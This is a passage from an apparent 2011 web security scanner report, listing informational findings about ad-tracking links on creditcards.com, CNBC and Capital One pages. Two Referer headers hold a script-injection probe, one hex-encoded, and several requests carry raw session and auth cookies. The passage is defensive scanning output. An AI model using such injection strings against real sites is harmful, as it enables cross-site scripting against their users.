15.90. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=514230

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS6956&t=2&rnd=682438136
http://ads.bluelithium.com/pixel?adv=23351&code=BK72627&t=2&rnd=1845015983
http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/EFD5B938-837D-4375-9FCF-5937CC010DA6/User/dOtxOExe99YJ7PJB/Segment/6956;12329;12330;72627/gif?meta=bkdtst
http://segment-pixel.invitemedia.com/pixel?pixelID=14128&partnerID=84&key=segment

Request

GET /site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=514230 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(%22%42%6C%69%6E%64%20%53%51%4C%20%49%6E%6A%65%63%74%69%6F%6E%22)%3C/script%3Eaaa9c6466f9=1
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=FCVLjD4Z+FyBvF/1; bkc=KJh56LLghaWDOdeF2HwZyHXyAX7YS6HjSHTNBxFnAEHAxPnYhAojsso3VcQABryLkJDSiNZMjiajtk7RKDtAVjQuAUBIlJkffrnKtb5fpg7wM9XGOOVm/kXoOuOedZZx7krYzWId5BC0qNObGkfSxzNabATeycklpU7n7vd5uuthYi0ubbOzMlZkH0NpFFj7YpO83fe0UTX2qo7pEUmI5+QwqWToCBTgPzXcoVz+zfftsoldTN8CJw5u2PmM2O9N680FFDIU+hyeakonvx5hnfLzkUbyFezQFVrjbtrUbKpq+JIg+ovfc+roxcMRJXl8tLz6at+urexzLzpht3aZrFXmCqpCPlG66h0FwDl5THRysctZdugUwv25owlTi6YVfwT4zL/7p4cSJIHY9DQqM32nzfptO5ke2KmsgdrAmPffZ2fdqAzCd4j/dXdMm+9k451r7509LnLItuaf3wfjyjI8w7LZJ8l1uFmGdxF/25/M; bko=KJhE8tPQVsEht8KP/PRxyZJADsSeLD8pyPClQmgXZkdf1Ma1QL301SCY2E/hJ9Jjrq/FQKgiCs9LVETsCoOlpTY0Ak9V/y19WeAqtQ==; bkw5=KJh2AE2n96Wxh5d5SLbf3vxuuHGHE1y4uOuav/iJhusUk/JVGCi6aWsqt9iYIQkiMkCfcXesHArh+nxvYaoRiOSuprM1qZewJLlLfgh2FhlKUAXei95yS1Zi7xz1t1f5J5eBD1+oGVL9WV08VZk7tKBnpyirjgE0ZQBVf9Yq8OkejhRRycW6kyeP5/agH+SqC9Wgg0ZMv12o0Mw+xjxzDKnRvfvids4pu7ZAjHv4wRU8a0ak9CXCpNuHjtGCSxvetw5RSRiFOue5DlCSs6KAZeHOIRHmErtD2WVYGuZjOZIodQpcDyRmVna24aBqRcNj1f6kfEcdKPh8327gCjUpWg9fc39ZKIXkBqrQ6TbgXrHlRgClZH7mX/Wbs9oysIDdm7HNcoNPdM64EhjfM/omNd1DA051yFnbdPs14/itJWP9CYMqa4P0vznj5Et52NoPXV1o4gkxfz4dkU52qJM14bk0qRQl0ksktHONuFGwk/NGBQ==; bkst=KJhBMqNvx6WxCSz/Yw8DoCwWy7jQjtztrTFPJDkCx1WgYi7MlqtawNzxx6Q7bJ1/+MbO/ai/oRICtBMqmBT67F/fcI56TsAjR9ZZpPkpmVFryX2KO8TP5SWG6YhYAzZq/BqFh9d+UfE4OoIokZxBEA/+vYRhhCxX23gSi7ev6j3qN7dd4fadIbUGV2WbLw1zG3WxGMBWDu0dqUN34q4020Yo1+qSMJygxZj03cnYVnLEaFaZTgCL8hfDlTOI1EyzM3xSI9LbTw7PfgxLEf7Ge4g0tL8rgQsLxCTpAjL4czdmghIPdynRhWvD; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101x8L4r6n9W5cOkz=; bklc=4dfb2873; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:22:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=2hpl98rL0+zBvF/1; expires=Wed, 14-Dec-2011 11:22:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56gkn9NWxOFeFrSnZ6eXQiXcY/hWavXAOQHuVWjWGaGG/GMjVQGPHYWxne6xqfuyWv0WV3PP//VJojtc7aHHJRD91iM1qU2h8h5F5cpF4Fs1lTy1v+LJhoJo3QWvsdB1AwqX1T5TObqeCwk+bLkcSygInYMQn9OKCSGGKcKzBzNbfZ6jiePQvN4nLzSd6ZscmSlIN9PBlY3+dd5QECM7FBrKNyl8QSNGCIasoKXsV7Mw1KKNNtFd7QXJGfgUr8tqoRHorzNffQ98FJxRL+o5uarJK5MA3dVCT4NObppelN0fEl75Gw5z5JVzI+kVOX/CwZFwSJdxrN3Jy8UnW1B5gONFodnLDXibd6D5pZIrNjIC0+961HP2GFzGhF2zr67gXHuOn5FT4zL/7p4USoIHY9DifcBIx87g+ufvcIL55FrZU87g+qdgI2fLvb4z7IFXXMQ126gK56LkBYeFpA0t0Cd34c2q1d5ZpmKkAPogFtgXe+B/p; expires=Wed, 14-Dec-2011 11:22:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJyf0Xl9X1Ui+0XMQhy4MBUW9VBBC1r3Xp/yn9v0VOkiOuWLHQjkBCMgBOK1BxA3hLSQY+UOhc9c0wJg4QNAJxJjrq/FQKgiCs9LVSY2/KIK9VDkGuhsOQ9oH04R; expires=Wed, 14-Dec-2011 11:22:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJh2Ag2n9ZWRhfd7kUjSTHuiu6H3dQQ+WA0y+ms/6psGvR3AhQC30uD03gd9aJrf3SZko53iLqaJvsoGiOgYnK+8fMNTgXUk4KdKfdF2wndKuCM9Q/ActL/TuQ9v3g8RsgiRGvmQYu2+YqHEgsMKZpmQsbzMqy+5OUOMEj5vmXsKorDjyFZDPabEy/JZRoDX/IC19l6DJhZYcSl3iNFgPDiOJ0Doy0MmuWGrJuizfEMr1g6GAdHNuc5gviVnHWjDhLGEWDavA7/JRiLgSpfmY/U8Rdi6aKS4moHH4eQXTup7NWnWO4HMttYkg7fB9MaqTjGNfJciGM3vOdE7g5H/phW1eRroXYK+wTwO3//5PgxZFrkRh4vXjOo8bUc2XNpZjPDOF1pJlcUnlfOFmp67OV9pRvJi7q6UC/zSCQN55JGpXmBV8tMmf+fgT+NzIdQBfmG0VZKHU6zEMhftvYD8wzmx6TF9RduS7o2XXnDLiQgPxPAFizQaBlKNSXCJnJDalhdk0mk0ndbF5qKJaH4p7XrXN+DlbgeGzNl5oh7X9uqEK3y=; expires=Wed, 14-Dec-2011 11:22:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:22:28 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 648
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BK72627&t=2&rnd=1845015983" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS6956&t=2&rnd=682438136" width=1 height=1 border=0 alt="">
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=14128&partnerID=84&key=segment" width=1 height=1 border=0 alt="">
<img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/EFD5B938-837D-4375-9FCF-5937CC010DA6/User/dOtxOExe99YJ7PJB/Segment/6956;12329;12330;72627/gif?meta=bkdtst" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

15.91. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=64038494

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS12329&t=2&rnd=1912674433
http://adadvisor.net/adscores/g.pixel?sid=9204125787&bk_uuid=3CuxOV%2Fv99e4kaJB&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2831%3Fphint%3Dzip%3D%25%7Bzip%7D%26phint%3Dage%3D%25%7Bindiv1.age%7D%26phint%3Dgender%3D%25%7Bindiv1.gender%7D%26phint%3Dsegment%3D%25%7Bscore%7D%26id=PARTNER_UUID
http://ads.bluelithium.com/pixel?adv=23351&code=BK12329&t=2&rnd=437943089

Request

GET /site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=64038494 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(%22BlindSQLInjection%22)%3C/script%3Eaaa9c6466f9=1
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=j+g8ULcsd86BvF/1; bkc=KJh56Mkn9NWxOdedz6UBGHXQyVeCaPsyAixnQHuVWjWGaGGWHstLO9rMW/QVcGQttkA/PA/LD3rxxLEupLnmv0iuyG9Ras4VFnMpigKfwljZlMDjcN9/vChc3AAnYC70E8w6devWIySkyTqfQ2JEM5/VdkNDyaA9rmi+Jr7Ez5Ty8t+l6TiF9DFAOLo7ElikhyNpFFjUspO2ofOS3XKKB1p8q7mI5+Qwq16GCeT35uXWoKz1zfftmrldX6aCnw5S2lmp29QB+pk4IT9mq0DsnnSUbwhLnfLzkUT6FeXAFVKRbtrUSKXf+JfgMo/pc2r3xcMDJXl8ti46n2SizmP0heecST5Sb40faw/rF2skrzlhtZkbcs6ey2WUoldu+4fxn+JbdWDQulqbChpluUmX2iZ8D9Oun+Lq6C0F4D7tDclq8jLOSRfUd3qfF22Pun6dD428c95bosXfoHmqWcqZJN+Ae2DdwdypNt4w83xEVVkISdXY/HEumy==; bko=KJyf0Xl9X1Ui+0XMQhy49ym48V24JGRZeCCg/khV7jKORHsxhzGxvyCC1E/GLXaRofkQgWkLWnlLevoxcDy15T9LFIqUxaRiAJDgIhvGnAT/ho/atCF0fCkxPCnvRZx99OG+JUT=; bkw5=KJh2DgXFxNWRwSXwNPKAQTi6iTQVqSDkZkuE6A3X0BBHyixSeSB/VcHOOU2OSVgtJoBah/2BMWjEAy3exRi/E4ZI58Fzj2eklF4rrK5X8dFmp4GO+J3TGb6wt0a9x5T52QW8sIncqC6jM9/79lEABScHaA/kyGCnrpGWSAWb6L3GvD9na7VJPWn1vPZz5CywuIxoeW0bEYyxoy+4/6OElRsGk7zcg4U1oX9jAuG5u/2vkDHW3/QIqZvBP/qGST4rakx0iNO15wRdyLyc3QPYyrEui8VT71jKEYOzrH5FzE7O9hFuQNzqhh27+tDWcW9pPQNsirgfseORHlQSnZyxT39m6NF6oIDvCY5/eWKVoLv4+cblK4LPgecivrsEMkU1EDCB/0A8MMIz6bEL3CrwT2vfqFswbg4+7w6DLBh+/ZK5FSxWCySsM07jqyYUropKAifuRVXKUmFLy8f/gufKtgZqlXtbn7NXE4mnvrcK0HhkHijrsenh9JhsGXx2h/mfqvZGDs63tHkHm5UYXbTj1313/83JErrPU2QTLhkHt5ww73vjHoPdgnLkperTzMUeSNa2okHWBAPNAlnfOuA9irQ=; bkst=KJhMR5Mehze9pkYSk8tUU8bl0mvlnyFe43YxY/mMGbTOOOCSsCrSsNiRsJkqVfT90CXY03LyZvzSooZAsO7GJk3AZKiSsvxRbN3ZVJMgZiV7sjZRsvKAVCGjB/ePU6Yty3d8BPeG9NO/Z1cRNBpRy+n961nY6+E96Beuh1MTC1JnGcxnBXQsA8HA901MGNH5T2HAxNNMR6BEUSeiaalnBB1ARh1EzTBWDI1QLcanQK3ksjy5URB5FD0uUzhpexmBvTLXuTmYLGy5pP0zERbOMjUMjVeQRDiBBeR6Bv61euFwvPAcagzVxc/Q7IPFUyegxAKJ; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101x8L4r6n9W5cOkz=; bklc=4dfb2873; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:23:01 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=OKqFqjizgJGBvF/1; expires=Wed, 14-Dec-2011 11:23:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56gkn96WDOFOFlveZ6ed9RneyiiCRuxT/onY1iWuhDWxx+qWun/hY/aoT/BoGj0aRYqa/gD/vWDLfYprFGWQv9tJx4s2NTgyoj75dfwFKcnLjwN9/vCha3iAwaenAflgoruD/2dHnC0llO3D7wB/mdkNDysAnzB85E5sMbfhkpZ+l6AiL9GFAmL3phlpuG8R8gdljeWpKv3pX2VmwVISXSz8gCyw98oHYbnNuXlhxK+R08fUUSwX42yGMrjKS7h3ACtiR8gptwClKzQhRSYtkc1H2fcJDILc0lGe6gZUrgNtZFVdEK3fSur8XqvzYTVsdBmKNMIk5gacC67eW1+5gC8gGdeLDXGj4bSmj87g+SqGzqQse6V5SglnBffVn+J89Wziul4Ic7wOnzfltYqkx9BvsTIFuUv22x4judfMCbp8og+4IGr2d+bmx47rAdXdgr3PnI3j5mgAORU5ILAwtDFIpQN2p4dj1EM3jkKSf2QXI5BJe; expires=Wed, 14-Dec-2011 11:23:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0ETtBQWnUXfzF161EOy19cjeWhEsveicWy7mPZRwCiX5rUAVWi7vUm0XYyY1CijRQPCn9RsjEjRvpEUeYVvkx5WX15/1rFIEVxkxCA8z3IO1gsYzaRLA9UCnhfOouPCn/RsxeAwiVm; expires=Wed, 14-Dec-2011 11:23:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhBMMNn96WxC3z/YWSMGaSYVBQrpmp1j75J5uxoaYJTGZ9jqdzvw6Txx6Q7bYXHqw6aQZ9CkFT1hzqKhLljlJEwIyfwtTn7HR9aZaE7N5V6K7YdGhSXJnxmVSqydXQpVUuiqz2doFyN8E+Q/8DuBv3hv6DJOkRImvrbHSkamWuFXqqr4pxPIl44Y46A+9jLnerw8JylumHaXdFtPToUtGtweEX455IKu0DD3nVmiZBOioZ1uF2OI5vzLGMaLKsXBM0Zdiq6LIcCzWIvQqtA9885f6f0d/0pf39FqfPoShkQYK/JW87j64c6TrSo8glPhGJmVF9cHf81P9==; expires=Wed, 14-Dec-2011 11:23:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJh2AfagWlWDhf2lPhwFpAGsAj/L/iRhE5nWRY9sRi2YefkAaB3os9p+vWvfB/LSD4IYtYwmlruAQTiNQ0YmELDoWBcOxHuHqGN2flbO5TJZI5l5fdwf4+2fFdKrAyjy1L9cKkp9FE0QGVzUDA9lx+JT1YV81FeL/Z6k9NM60sBDRZJSK6I90uJ+VDB1BYYsZbbxDjTN43ijh2BnxgTDQs+ZQcUu71PCOjiqj3Yi2KpazctH6FY00wT3XC/mvr/unT7dSExFYbZUknI3znXb0f2/qd4oqBIQ11CUPzldJbpXBtc7E8xaiOuGLixtS6/KPCUC71fMH6NrdUsW71wliYj5Tp3s0mM9Y5ptZ9017NK9lJEyejgRJ3JEfztf2sPNIXEgj/q56awMPN3wEiVpsrTy1UlXoZ6e3XFibEPWGdIkK5bx3CqyISgAfGqblK7o3mSH9tyLOmisK2XzoSWnyp+cbLlOSA32FNSWjweskHrd8S3mz+RJFcD8ytQUlf+3zkdjw/PqgZHTKJl7hX4cmsr6kA0J8XZDjOeljANJQ7uyCbsn9uwi6ZZo0Wb1mpchoJohu6lrZ4Y4KHlHlsig0/AL8NHrpTgXJppgR6l70m1tgywMvdPn5VNQfaOcMycyC8jx; expires=Wed, 14-Dec-2011 11:23:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:23:01 GMT; path=/; domain=.bluekai.com
BK-Server: ddb4
Content-Length: 651
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BK12329&t=2&rnd=437943089" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS12329&t=2&rnd=1912674433" width=1 height=1 border=0 alt="">
<img src="http://adadvisor.net/adscores/g.pixel?sid=9204125787&bk_uuid=3CuxOV%2Fv99e4kaJB&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2831%3Fphint%3Dzip%3D%25%7Bzip%7D%26phint%3Dage%3D%25%7Bindiv1.age%7D%26phint%3Dgender%3D%25%7Bindiv1.gender%7D%26phint%3Dsegment%3D%25%7Bscore%7D%26id=PARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

15.92. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=39496438

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS6956&t=2&rnd=366464809
http://adadvisor.net/adscores/g.pixel?sid=9204125787&bk_uuid=eLy%2BEHWs99eczBOB&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2831%3Fphint%3Dzip%3D%25%7Bzip%7D%26phint%3Dage%3D%25%7Bindiv1.age%7D%26phint%3Dgender%3D%25%7Bindiv1.gender%7D%26phint%3Dsegment%3D%25%7Bscore%7D%26id=PARTNER_UUID
http://ads.bluelithium.com/pixel?adv=23351&code=BK12329&t=2&rnd=471567808

Request

Response

15.93. http://ticker.cnbc.com/scripts/cnbc_ticker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ticker.cnbc.com
Path:	/scripts/cnbc_ticker.js

Issue detail

The page was loaded from a URL containing a query string:

http://ticker.cnbc.com/scripts/cnbc_ticker.js?v=C0950

The response contains the following link to another domain:

http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'

Request

GET /scripts/cnbc_ticker.js?v=C0950 HTTP/1.1
Host: ticker.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Fri, 28 Aug 2009 14:56:14 GMT
ETag: "11406f-6c6b-47234e2b19f80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Date: Thu, 16 Jun 2011 11:25:33 GMT
Content-Length: 27755
Connection: close

var isIE=navigator.appName.indexOf("Microsoft")>-1;var saved_cnbc_video_setURL=null;var cnbc_MONTH_NAMES=new Array('January','February','March','April','May','June','July','August','September','Octo
...[SNIP]...
<param name="allowScriptAccess" value="always" />'+'<embed id="'+variableName+'" name="'+variableName+'" play="true" src="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" AllowScriptAccess="always" quality="high" bgcolor="#ffffff" width="1" height="1" align="middle" type="application/x-shockwave-flash" /></object>
...[SNIP]...
<param name="movie" value="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" />');document.write('<embed id="'+varName+'" name="'+varName+'" play="true" src="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" AllowScriptAccess="always" quality="high" bgcolor="#ffffff" width="1" height="1" align="middle" type="application/x-shockwave-flash" />');document.write('</object>
...[SNIP]...

15.94. http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/creditcards/venture-one-rewards-credit-card/11858/15/

Issue detail

The page was loaded from a URL containing a query string:

http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85815EW

The response contains the following links to other domains:

http://get.adobe.com/reader/
http://switch.atdmt.com/iaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15
http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

Request

GET /creditcards/venture-one-rewards-credit-card/11858/15/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85815EW HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105049&pg=1477&pgpos=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP_GROUP=test; BIGipServerpl_capitalone.com_80=812197130.29215.0000; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; smartTracking=referrer%3A%3A%3Dwww.creditcards.com; external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:36 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 40299
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<p class="getReader on">
<a target="_blank" href="http://get.adobe.com/reader/">
<img height="29" width="116" title="Get Adobe Reader" alt="Get Adobe Reader" src="/img/global/btn/get_acrobat.gif" />
...[SNIP]...

<script type="text/javascript" src="http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15"></script>
<noscript>
<iframe src="http://switch.atdmt.com/iaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15" width="1" height="1" frameborder="0" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.95. http://www.cnbc.com/js/cnbc_quote_components.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/js/cnbc_quote_components.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.cnbc.com/js/cnbc_quote_components.js?rti=201008

The response contains the following link to another domain:

http://java.sun.com/update/1.5.0/jinstall-1_5_0-windows-i586.cab

Request

GET /js/cnbc_quote_components.js?rti=201008 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OREF=http://cnbc.com/; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc8sw%2fTFdw%2bInzeR9sZPbv%2bikjEmZ1XunWc1rZLXqeFOQ%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3RpMVhSa7sDU=; TZM=-300

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 15 Jun 2011 14:09:33 GMT
Via: 1.1 C aicache6
Content-Length: 155345
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 14:09:34 GMT

var cnbc_mrq_numElements=5;var cnbc_mrq_expiration_hours=24;var cnbc_mrq_baseCookieName='cnbc_most_recent_quotes';var cnbc_mrq_baseDivId='cnbc_most_recent_symbol_';var cnbc_mrq_symbols_getDataQueue;
...[SNIP]...
<div style="margin-left:5px;">';html+='<OBJECT Name="CNBC chart" Width="200" Height="175" codebase="http://java.sun.com/update/1.5.0/jinstall-1_5_0-windows-i586.cab#Version=1,5,0" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" MAYSCRIPT="" >';html+='<PARAM NAME="Archive" VALUE="http://'+server+'/api/tickbytick/cnbc.jar"/>
...[SNIP]...

15.96. http://www.creditcards.com/oc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The page was loaded from a URL containing a query string:

